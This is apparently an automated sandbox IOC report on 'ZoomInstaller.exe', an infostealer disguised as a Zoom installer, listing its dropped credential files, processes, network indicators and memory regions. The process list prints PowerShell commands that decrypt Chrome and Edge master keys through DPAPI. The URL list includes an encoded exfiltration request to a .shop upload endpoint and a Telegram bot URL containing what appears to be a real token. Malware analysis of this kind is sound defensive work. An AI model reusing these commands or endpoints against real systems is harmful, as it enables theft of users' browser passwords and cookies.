IOC Report
ZoomInstaller.exe

loading gif

Files

File Path
Type
Category
Malicious
ZoomInstaller.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Ailurophile\Autofills\Autofills.txt
ASCII text
dropped
malicious
C:\Users\user\AppData\Local\Ailurophile\Cards\Cards.txt
ASCII text
dropped
malicious
C:\Users\user\AppData\Local\Ailurophile\Cookies\Google_Default.txt
ASCII text, with very long lines (515)
dropped
malicious
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
malicious
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.db
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
dropped
malicious
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
malicious
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.db
SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
dropped
malicious
C:\Users\user\AppData\Local\Ailurophile.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Ailurophile\History\Google-Default.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Ailurophile\History\Microsoft-Default.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Ailurophile\Passwords\Google-Default.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Ailurophile\Passwords\Microsoft-Default.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Ailurophile\info.txt
Unicode text, UTF-8 text, with very long lines (425)
dropped
C:\Users\user\AppData\Local\Ailurophile\stolen_files.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web.db
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\passwords.db
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\webdata.db
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3z4uwxfe.fci.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cig3xdrr.qj1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mngndqvq.ulc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nau0334u.ney.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0gvwhgn.j2r.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3eiig4y.fce.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umb4p1ct.5co.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vb4beibc.i21.psm1
ASCII text, with no line terminators
dropped
There are 18 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\ZoomInstaller.exe
"C:\Users\user\Desktop\ZoomInstaller.exe"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic path win32_videocontroller get caption
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
wmic os get Caption
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
wmic os get Version
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 9 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTMzKzRqMldDaGJTYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bUJoMzNaZTlGOFpaaDRuSjdEdmR1cWw3S3JabnllZWM5K3A0Q2VqWW10bk1YZnJHMTlvNk9aZjNkKzA1TzdycUNYcXF4bnE5QzRvSUI4ckpxVlo0cmJscXlBYVgyYjBwcTR2WmlubUlDNG0zeDZncGFMdklpZ2w2cXNwS3ZVeDUrV2dOcWNsM2Q5bkh2T2U1MkFkSzJndzc2eFo1WnNyR1Y4bnFQUGdhZUFiUT09&hash=2d6441c1bfc749b0344f
188.114.97.3
malicious
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://api.myip.com
unknown
https://duckduckgo.com/ac/?q=
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.myip.com/
104.26.9.59
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://manestvli.shop/upload.php?
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://api.telegram.org/bot%s/sendMessage
unknown
https://manestvli.shop/upload.php?C:
unknown
https://www.ecosia.org/newtab/
unknown
https://github.com/Pester/Pester
unknown
https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage
149.154.167.220
https://ac.ecosia.org/autocomplete?q=
unknown
https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drT
unknown
https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
https://ailurophilestealer.com/bot
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://aka.ms/pscore68
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016========
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://oneget.org
unknown
https://ailurophilestealer.com
unknown
There are 29 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
manestvli.shop
188.114.97.3
malicious
api.telegram.org
149.154.167.220
malicious
api.myip.com
104.26.9.59

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.97.3
manestvli.shop
European Union
malicious
104.26.9.59
api.myip.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
FDDA57F000
stack
page read and write
1405E300000
heap
page execute and read and write
19C74798000
heap
page read and write
1AA4989E000
heap
page read and write
7FFD9BB50000
trusted library allocation
page execute and read and write
1FAF28B8000
heap
page read and write
2976C831000
heap
page read and write
19C747AC000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1AA49F25000
heap
page read and write
7FF6845AA000
unkown
page write copy
1AA49F0E000
heap
page read and write
C00006C000
direct allocation
page read and write
1405C569000
heap
page read and write
C0000C8000
direct allocation
page read and write
1AA49940000
trusted library allocation
page read and write
256386B6000
heap
page read and write
19C742C1000
heap
page read and write
C00008A000
direct allocation
page read and write
C000576000
direct allocation
page read and write
2976C835000
heap
page read and write
C00041A000
direct allocation
page read and write
7FF685593000
unkown
page readonly
21DDFB87000
heap
page read and write
19C747A9000
heap
page read and write
7FF6841C1000
unkown
page execute read
C0000A6000
direct allocation
page read and write
21DDFBEA000
heap
page read and write
21DE01AE000
heap
page read and write
19C7488E000
heap
page read and write
C00012E000
direct allocation
page read and write
19C742ED000
heap
page read and write
2FA09FB000
stack
page read and write
C000252000
direct allocation
page read and write
C0000B6000
direct allocation
page read and write
29919255000
heap
page read and write
C00028A000
direct allocation
page read and write
2976C7E4000
heap
page read and write
19C7478C000
heap
page read and write
1AA49EFC000
heap
page read and write
21DDFBE5000
heap
page read and write
FDDA6FB000
stack
page read and write
7FF6845EC000
unkown
page readonly
2FA097E000
stack
page read and write
21DDFC85000
heap
page read and write
C00013C000
direct allocation
page read and write
1AA49853000
heap
page read and write
1AA4980E000
heap
page read and write
C000212000
direct allocation
page read and write
1AA49847000
heap
page read and write
19C7488A000
heap
page read and write
2991902C000
heap
page read and write
2976C7E7000
heap
page read and write
C00015D000
direct allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
19C74883000
heap
page read and write
7FFD9BC80000
trusted library allocation
page read and write
4F002FE000
stack
page read and write
21DDFBF2000
heap
page read and write
25636CE0000
heap
page readonly
25636D25000
heap
page read and write
29745990000
heap
page read and write
1AA49853000
heap
page read and write
19C747A0000
heap
page read and write
2976C81A000
heap
page read and write
25650D2C000
heap
page read and write
1407670F000
heap
page read and write
19C741E0000
trusted library allocation
page read and write
21DE019A000
heap
page read and write
FDD9D03000
stack
page read and write
C0002FC000
direct allocation
page read and write
140765BD000
heap
page read and write
7FF685597000
unkown
page readonly
C00017A000
direct allocation
page read and write
1406E311000
trusted library allocation
page read and write
1AA49842000
heap
page read and write
7FF684969000
unkown
page readonly
2FA07FE000
stack
page read and write
FDDA478000
stack
page read and write
25636C70000
heap
page read and write
2976C790000
direct allocation
page read and write
21DDFB8A000
heap
page read and write
19C747A9000
heap
page read and write
1405C564000
heap
page read and write
FDDA1FE000
stack
page read and write
19C742AF000
heap
page read and write
C000438000
direct allocation
page read and write
297456F0000
heap
page read and write
7FFD9BB6A000
trusted library allocation
page read and write
1AA49836000
heap
page read and write
CFBA37B000
stack
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
7FF68496A000
unkown
page read and write
2563A691000
trusted library allocation
page read and write
25636C30000
heap
page read and write
7FF6845E1000
unkown
page write copy
1AA49F1A000
heap
page read and write
1AA4986A000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
140765CE000
heap
page read and write
7FF6845AC000
unkown
page write copy
1AA49F23000
heap
page read and write
2976C7E6000
heap
page read and write
1AA49A6A000
heap
page read and write
2976C7F1000
heap
page read and write
19C74882000
heap
page read and write
7FF68496A000
unkown
page write copy
1405C53D000
heap
page read and write
C000108000
direct allocation
page read and write
19C747B5000
heap
page read and write
1AA49EFE000
heap
page read and write
19C740C0000
heap
page read and write
7FFD9BCE9000
trusted library allocation
page read and write
2974591C000
direct allocation
page read and write
21DDFBE6000
heap
page read and write
2976C7FB000
heap
page read and write
2976C80A000
heap
page read and write
21DE1B2D000
heap
page read and write
19C742E8000
heap
page read and write
14076700000
heap
page read and write
C000000000
direct allocation
page read and write
1AA49862000
heap
page read and write
1AA49EF8000
heap
page read and write
19C76174000
heap
page read and write
19C747AF000
heap
page read and write
19C742E1000
heap
page read and write
1AA4986A000
heap
page read and write
21DE01B4000
heap
page read and write
C00047C000
direct allocation
page read and write
19C74787000
heap
page read and write
2976C7EF000
heap
page read and write
C000484000
direct allocation
page read and write
C00004D000
direct allocation
page read and write
2976C8E3000
direct allocation
page read and write
21DDFC8A000
heap
page read and write
2976C803000
heap
page read and write
7FFD9BA4C000
trusted library allocation
page execute and read and write
21DE0190000
heap
page read and write
25650AE8000
heap
page read and write
19C747B7000
heap
page read and write
C000010000
direct allocation
page read and write
21DDFBBC000
heap
page read and write
2976C835000
heap
page read and write
7B198FE000
stack
page read and write
2976C81B000
heap
page read and write
3EA4E7F000
stack
page read and write
19C742D8000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
2976C7F9000
heap
page read and write
C000157000
direct allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
C000236000
direct allocation
page read and write
1405C52C000
heap
page read and write
21DE01B2000
heap
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
19C747A9000
heap
page read and write
1AA49800000
heap
page read and write
1405FBF6000
trusted library allocation
page read and write
140764F6000
heap
page execute and read and write
19C74420000
heap
page read and write
19C7617D000
heap
page read and write
25636CD0000
trusted library allocation
page read and write
C0000A8000
direct allocation
page read and write
1405EF42000
trusted library allocation
page read and write
C0000CC000
direct allocation
page read and write
C000176000
direct allocation
page read and write
2976C7F1000
heap
page read and write
19C74278000
heap
page read and write
21DE1B34000
heap
page read and write
1405FC51000
trusted library allocation
page read and write
2F9FFDF000
stack
page read and write
19C747A9000
heap
page read and write
7FFD9BB72000
trusted library allocation
page read and write
7FF6845E5000
unkown
page read and write
2976C799000
direct allocation
page read and write
19C76170000
heap
page read and write
C000118000
direct allocation
page read and write
1AA49990000
heap
page read and write
21DDFBB7000
heap
page read and write
1407656B000
heap
page read and write
19C742A7000
heap
page read and write
2976C81A000
heap
page read and write
2FA02FE000
stack
page read and write
1405C4E0000
heap
page read and write
C000554000
direct allocation
page read and write
1405FC16000
trusted library allocation
page read and write
21DE01C9000
heap
page read and write
19C747B2000
heap
page read and write
19C747A0000
heap
page read and write
C000600000
direct allocation
page read and write
C000184000
direct allocation
page read and write
C0000C4000
direct allocation
page read and write
25650BF0000
heap
page read and write
25636A9E000
heap
page read and write
C0003BC000
direct allocation
page read and write
7FFD9BC00000
trusted library allocation
page read and write
29745A28000
direct allocation
page read and write
19C74287000
heap
page read and write
19C742D2000
heap
page read and write
1FAF28BA000
heap
page read and write
1FAF2A25000
heap
page read and write
25650D48000
heap
page read and write
19C742E1000
heap
page read and write
FDDA67E000
stack
page read and write
7FFD9BC10000
trusted library allocation
page read and write
2976C810000
heap
page read and write
C00057E000
direct allocation
page read and write
2976C835000
heap
page read and write
19C742D6000
heap
page read and write
C000151000
direct allocation
page read and write
1AA49861000
heap
page read and write
29745980000
direct allocation
page read and write
19C76171000
heap
page read and write
2976C835000
heap
page read and write
29918FE8000
heap
page read and write
19C74884000
heap
page read and write
19C741E0000
trusted library allocation
page read and write
1FAF28AC000
heap
page read and write
25650BD0000
heap
page read and write
21DDFBA9000
heap
page read and write
C00035E000
direct allocation
page read and write
1FAF27A0000
heap
page read and write
2991903A000
heap
page read and write
C000564000
direct allocation
page read and write
4F003FE000
stack
page read and write
7FF68536E000
unkown
page readonly
1AA49874000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
21DDFBE5000
heap
page read and write
C00022C000
direct allocation
page read and write
4F004FE000
stack
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
7FF684965000
unkown
page read and write
7FFD9B994000
trusted library allocation
page read and write
1AA49897000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
7FF6841C0000
unkown
page readonly
1406E384000
trusted library allocation
page read and write
C000513000
direct allocation
page read and write
FDDA4F9000
stack
page read and write
C000500000
direct allocation
page read and write
25636AAC000
heap
page read and write
1405C640000
heap
page read and write
AA28FFE000
stack
page read and write
2976C7EF000
heap
page read and write
1AA49F22000
heap
page read and write
1407659B000
heap
page read and write
1FAF2980000
heap
page read and write
2976C81F000
heap
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
1405C566000
heap
page read and write
19C742E7000
heap
page read and write
29919016000
heap
page read and write
14076460000
heap
page read and write
19C742AF000
heap
page read and write
19C747B4000
heap
page read and write
21DDFBA9000
heap
page read and write
21DDFB78000
heap
page read and write
7FFD9BA46000
trusted library allocation
page read and write
FDDA379000
stack
page read and write
2FA067C000
stack
page read and write
19C742D9000
heap
page read and write
1FAF29A0000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
19C74794000
heap
page read and write
1FAF28DB000
heap
page read and write
25650B9F000
heap
page read and write
21DE01B5000
heap
page read and write
1AA49853000
heap
page read and write
21DE1B21000
heap
page read and write
FDDA07E000
stack
page read and write
19C7478C000
heap
page read and write
C000276000
direct allocation
page read and write
19C74287000
heap
page read and write
2976C7E4000
heap
page read and write
FDDA2FF000
stack
page read and write
C000140000
direct allocation
page read and write
21DDFB86000
heap
page read and write
C00009A000
direct allocation
page read and write
2FA06F8000
stack
page read and write
21DDFB88000
heap
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
7FFD9BBA0000
trusted library allocation
page execute and read and write
1405C360000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
7FFD9BB41000
trusted library allocation
page read and write
25639633000
trusted library allocation
page read and write
C00002C000
direct allocation
page read and write
2976C803000
heap
page read and write
21DDFBC4000
heap
page read and write
C00003A000
direct allocation
page read and write
25650AB7000
heap
page execute and read and write
7FF6845E2000
unkown
page read and write
2976C835000
heap
page read and write
19C74794000
heap
page read and write
297459F0000
direct allocation
page read and write
C000078000
direct allocation
page read and write
2976C80B000
heap
page read and write
C00007E000
direct allocation
page read and write
19C742CB000
heap
page read and write
1405C620000
trusted library allocation
page read and write
1AA49817000
heap
page read and write
2976C80E000
heap
page read and write
140765CB000
heap
page read and write
21DE0197000
heap
page read and write
29919005000
heap
page read and write
1405C600000
trusted library allocation
page read and write
25636AAA000
heap
page read and write
C000148000
direct allocation
page read and write
FDDA27E000
stack
page read and write
C0001A4000
direct allocation
page read and write
1AA49842000
heap
page read and write
25638C33000
trusted library allocation
page read and write
25638540000
heap
page execute and read and write
21DDFB87000
heap
page read and write
C000178000
direct allocation
page read and write
FDD9D8D000
stack
page read and write
C00006E000
direct allocation
page read and write
19C747A0000
heap
page read and write
C0002D6000
direct allocation
page read and write
19C742CA000
heap
page read and write
2976C80B000
heap
page read and write
19C7488E000
heap
page read and write
29745A68000
heap
page read and write
1AA49834000
heap
page read and write
FDD9DCE000
stack
page read and write
2FA087E000
stack
page read and write
7B1958E000
stack
page read and write
7FF685593000
unkown
page readonly
1AA498A9000
heap
page read and write
21DE01A0000
heap
page read and write
C000214000
direct allocation
page read and write
1AA49855000
heap
page read and write
1AA49812000
heap
page read and write
2974574B000
heap
page read and write
2976C7F8000
heap
page read and write
25636CB0000
trusted library allocation
page read and write
3EA4F7F000
stack
page read and write
19C742C5000
heap
page read and write
1AA49876000
heap
page read and write
C0003B8000
direct allocation
page read and write
C00043E000
direct allocation
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
14076620000
heap
page read and write
7B1987E000
stack
page read and write
4F00278000
stack
page read and write
21DDFBA2000
heap
page read and write
2976C81D000
heap
page read and write
21DDFBA4000
heap
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
C0000BC000
direct allocation
page read and write
C000174000
direct allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
1AA49F0E000
heap
page read and write
1AA4987B000
heap
page read and write
2976C803000
heap
page read and write
19C742ED000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
21DE1B20000
heap
page read and write
2976C811000
heap
page read and write
2976C811000
heap
page read and write
7FFD9BB60000
trusted library allocation
page execute and read and write
C000062000
direct allocation
page read and write
C0000BE000
direct allocation
page read and write
7FF6845A7000
unkown
page read and write
21DDFBFB000
heap
page read and write
1405C610000
heap
page readonly
C000170000
direct allocation
page read and write
2991903B000
heap
page read and write
29745800000
heap
page read and write
25648BB7000
trusted library allocation
page read and write
1407672F000
heap
page read and write
C000508000
direct allocation
page read and write
25648CFD000
trusted library allocation
page read and write
21DDFC8D000
heap
page read and write
19C742D0000
heap
page read and write
7FF6845AB000
unkown
page read and write
C00030C000
direct allocation
page read and write
C00032A000
direct allocation
page read and write
19C747AA000
heap
page read and write
C000254000
direct allocation
page read and write
19C74788000
heap
page read and write
21DDFBC9000
heap
page read and write
1AA4B866000
heap
page read and write
C0002D0000
direct allocation
page read and write
21DDFBD8000
heap
page read and write
C0001EC000
direct allocation
page read and write
3EA4BF8000
stack
page read and write
2991902C000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
7FF684939000
unkown
page read and write
C0002B2000
direct allocation
page read and write
1405FF98000
trusted library allocation
page read and write
2976C80B000
heap
page read and write
2FA037F000
stack
page read and write
2976C80D000
heap
page read and write
1AA4B852000
heap
page read and write
21DDFBAD000
heap
page read and write
C000190000
direct allocation
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
C000394000
direct allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
1AA49874000
heap
page read and write
C000336000
direct allocation
page read and write
2991900B000
heap
page read and write
21DDFB58000
heap
page read and write
19C741E0000
trusted library allocation
page read and write
21DDFBE5000
heap
page read and write
1AA49A6D000
heap
page read and write
C00021E000
direct allocation
page read and write
1AA4B864000
heap
page read and write
2991903A000
heap
page read and write
AA28DFE000
stack
page read and write
1AA4989B000
heap
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
1AA49F19000
heap
page read and write
25636A30000
heap
page read and write
AA29FFC000
stack
page read and write
7DF40DBC0000
trusted library allocation
page execute and read and write
25636A69000
heap
page read and write
7FF684969000
unkown
page readonly
29745A6A000
heap
page read and write
2976C809000
heap
page read and write
C000274000
direct allocation
page read and write
C00001A000
direct allocation
page read and write
7B1950E000
stack
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
25648A10000
trusted library allocation
page read and write
C000340000
direct allocation
page read and write
1AA49920000
heap
page read and write
19C742DB000
heap
page read and write
21DDFB00000
heap
page read and write
7FFD9BD10000
trusted library allocation
page read and write
21DE1B34000
heap
page read and write
21DDFBBA000
heap
page read and write
C000260000
direct allocation
page read and write
C0000A0000
direct allocation
page read and write
1AA4985D000
heap
page read and write
AA29BFF000
stack
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
2976C803000
heap
page read and write
25650D1B000
heap
page read and write
2976C795000
direct allocation
page read and write
7FF6845D2000
unkown
page read and write
C000388000
direct allocation
page read and write
21DDFBBA000
heap
page read and write
C000012000
direct allocation
page read and write
1AA4985D000
heap
page read and write
7FFD9BC90000
trusted library allocation
page read and write
2991903E000
heap
page read and write
C000128000
direct allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
C00039E000
direct allocation
page read and write
21DDFB50000
heap
page read and write
21DDFBE8000
heap
page read and write
21DDFBBF000
heap
page read and write
25648A01000
trusted library allocation
page read and write
7FFD9BD09000
trusted library allocation
page read and write
29745914000
direct allocation
page read and write
C000208000
direct allocation
page read and write
19C7488A000
heap
page read and write
21DE01C9000
heap
page read and write
7FF684933000
unkown
page read and write
7FFD9BA6C000
trusted library allocation
page execute and read and write
C000153000
direct allocation
page read and write
1AA49846000
heap
page read and write
21DDFBE8000
heap
page read and write
25650AEB000
heap
page read and write
C0000EC000
direct allocation
page read and write
2976C7E7000
heap
page read and write
AA299FE000
stack
page read and write
29919250000
heap
page read and write
7FFD9BB61000
trusted library allocation
page read and write
AA295FE000
stack
page read and write
7FFD9BCE6000
trusted library allocation
page read and write
7FFD9B9B4000
trusted library allocation
page read and write
C0002AA000
direct allocation
page read and write
C0001CE000
direct allocation
page read and write
C000548000
direct allocation
page read and write
2563A2EA000
trusted library allocation
page read and write
19C742DE000
heap
page read and write
1405E542000
trusted library allocation
page read and write
1AA49F1C000
heap
page read and write
25638A89000
trusted library allocation
page read and write
1405C720000
heap
page execute and read and write
1AA49EF7000
heap
page read and write
C0000FC000
direct allocation
page read and write
2FA057E000
stack
page read and write
C000033000
direct allocation
page read and write
2976C80B000
heap
page read and write
1405E38C000
trusted library allocation
page read and write
3EA4FFF000
stack
page read and write
7FFD9B9B3000
trusted library allocation
page execute and read and write
1AA49F04000
heap
page read and write
7FFD9BB4A000
trusted library allocation
page read and write
29745910000
direct allocation
page read and write
C000064000
direct allocation
page read and write
1405C6D3000
trusted library allocation
page read and write
21DDFBED000
heap
page read and write
1405C755000
heap
page read and write
7FF68496B000
unkown
page write copy
25636A40000
heap
page read and write
19C747A9000
heap
page read and write
2974576C000
heap
page read and write
C000046000
direct allocation
